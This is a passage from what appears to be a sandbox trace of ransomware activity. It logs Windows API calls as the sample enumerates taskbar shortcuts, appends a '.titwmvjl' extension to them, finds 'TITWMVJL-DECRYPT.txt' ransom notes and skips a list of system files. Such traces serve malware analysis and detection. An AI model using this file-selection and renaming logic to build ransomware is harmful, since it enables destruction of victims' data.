flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.247] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.titwmvjl") returned 119 [0072.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0072.247] lstrlenW (lpString=".ini") returned 4 [0072.247] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.247] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ini ") returned 5 [0072.247] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0072.247] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0072.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 110 [0072.247] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0072.247] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.247] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.247] lstrcmpW (lpString1="Excel 2016.lnk", lpString2=".") returned 1 [0072.247] lstrcmpW (lpString1="Excel 2016.lnk", lpString2="..") returned 1 [0072.248] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Excel 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk" [0072.248] lstrlenW (lpString=".titwmvjl") returned 9 [0072.248] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned 113 [0072.248] VirtualAlloc (lpAddress=0x0, dwSize=0x122, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.248] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk.titwmvjl") returned 122 [0072.248] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Excel 2016.lnk") returned 113 [0072.248] lstrlenW (lpString=".lnk") returned 4 [0072.248] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.248] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.248] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.248] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.249] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.249] lstrcmpW (lpString1="File Explorer.lnk", lpString2=".") returned 1 [0072.249] lstrcmpW (lpString1="File Explorer.lnk", lpString2="..") returned 1 [0072.249] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="File Explorer.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk" [0072.249] lstrlenW (lpString=".titwmvjl") returned 9 [0072.249] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0072.249] VirtualAlloc (lpAddress=0x0, dwSize=0x128, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.249] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk.titwmvjl") returned 125 [0072.249] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk") returned 116 [0072.249] lstrlenW (lpString=".lnk") returned 4 [0072.249] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.249] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.250] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.250] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.250] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.250] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0072.250] lstrcmpW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0072.250] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Mozilla Firefox.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk" [0072.250] lstrlenW (lpString=".titwmvjl") returned 9 [0072.250] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 118 [0072.250] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.250] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk.titwmvjl") returned 127 [0072.251] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Mozilla Firefox.lnk") returned 118 [0072.251] lstrlenW (lpString=".lnk") returned 4 [0072.251] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.251] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.251] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.251] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.251] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.251] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2=".") returned 1 [0072.251] lstrcmpW (lpString1="OneNote 2016.lnk", lpString2="..") returned 1 [0072.252] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="OneNote 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk" [0072.252] lstrlenW (lpString=".titwmvjl") returned 9 [0072.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned 115 [0072.252] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.252] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk.titwmvjl") returned 124 [0072.252] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\OneNote 2016.lnk") returned 115 [0072.252] lstrlenW (lpString=".lnk") returned 4 [0072.252] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.252] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.252] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.252] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.253] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.253] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2=".") returned 1 [0072.253] lstrcmpW (lpString1="Outlook 2016.lnk", lpString2="..") returned 1 [0072.253] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Outlook 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk" [0072.253] lstrlenW (lpString=".titwmvjl") returned 9 [0072.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned 115 [0072.253] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.253] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk.titwmvjl") returned 124 [0072.253] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Outlook 2016.lnk") returned 115 [0072.253] lstrlenW (lpString=".lnk") returned 4 [0072.253] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.254] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.254] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.254] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.254] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.254] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2=".") returned 1 [0072.254] lstrcmpW (lpString1="PowerPoint 2016.lnk", lpString2="..") returned 1 [0072.254] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="PowerPoint 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk" [0072.254] lstrlenW (lpString=".titwmvjl") returned 9 [0072.254] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned 118 [0072.254] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.254] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk.titwmvjl") returned 127 [0072.255] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\PowerPoint 2016.lnk") returned 118 [0072.255] lstrlenW (lpString=".lnk") returned 4 [0072.255] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.255] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.255] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.255] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.255] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.255] lstrcmpW (lpString1="Project 2016.lnk", lpString2=".") returned 1 [0072.255] lstrcmpW (lpString1="Project 2016.lnk", lpString2="..") returned 1 [0072.255] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Project 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk" [0072.255] lstrlenW (lpString=".titwmvjl") returned 9 [0072.255] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk") returned 115 [0072.255] VirtualAlloc (lpAddress=0x0, dwSize=0x126, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.256] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk.titwmvjl") returned 124 [0072.256] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Project 2016.lnk") returned 115 [0072.256] lstrlenW (lpString=".lnk") returned 4 [0072.256] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.256] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.256] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.256] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.256] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.257] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.257] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.257] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt" [0072.257] lstrlenW (lpString=".titwmvjl") returned 9 [0072.257] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt") returned 119 [0072.257] VirtualAlloc (lpAddress=0x0, dwSize=0x12e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.257] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 128 [0072.257] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt") returned 119 [0072.257] lstrlenW (lpString=".txt") returned 4 [0072.257] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.257] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.257] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.257] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.258] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt") returned 119 [0072.258] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\TITWMVJL-DECRYPT.txt") returned 119 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.258] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.258] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.258] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.258] lstrcmpW (lpString1="Visio 2016.lnk", lpString2=".") returned 1 [0072.258] lstrcmpW (lpString1="Visio 2016.lnk", lpString2="..") returned 1 [0072.258] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Visio 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk" [0072.258] lstrlenW (lpString=".titwmvjl") returned 9 [0072.258] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk") returned 113 [0072.258] VirtualAlloc (lpAddress=0x0, dwSize=0x122, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.258] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk.titwmvjl") returned 122 [0072.258] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Visio 2016.lnk") returned 113 [0072.258] lstrlenW (lpString=".lnk") returned 4 [0072.258] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.259] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.259] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.259] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.259] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.259] lstrcmpW (lpString1="Word 2016.lnk", lpString2=".") returned 1 [0072.259] lstrcmpW (lpString1="Word 2016.lnk", lpString2="..") returned 1 [0072.259] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="Word 2016.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk" [0072.259] lstrlenW (lpString=".titwmvjl") returned 9 [0072.259] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned 112 [0072.259] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.259] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk.titwmvjl") returned 121 [0072.259] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Word 2016.lnk") returned 112 [0072.259] lstrlenW (lpString=".lnk") returned 4 [0072.259] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.260] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.260] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.260] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.260] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0072.260] FindClose (in: hFindFile=0x5032f8 | out: hFindFile=0x5032f8) returned 1 [0072.261] CloseHandle (hObject=0x2d4) returned 1 [0072.261] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.261] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.261] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.261] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt" [0072.261] lstrlenW (lpString=".titwmvjl") returned 9 [0072.261] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt") returned 111 [0072.261] VirtualAlloc (lpAddress=0x0, dwSize=0x11e, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.261] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 120 [0072.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt") returned 111 [0072.262] lstrlenW (lpString=".txt") returned 4 [0072.262] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.262] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.262] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.262] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt") returned 111 [0072.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TITWMVJL-DECRYPT.txt") returned 111 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.262] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.262] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.262] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0072.263] FindClose (in: hFindFile=0x503278 | out: hFindFile=0x503278) returned 1 [0072.263] CloseHandle (hObject=0x2cc) returned 1 [0072.263] FindNextFileW (in: hFindFile=0x5037b8, 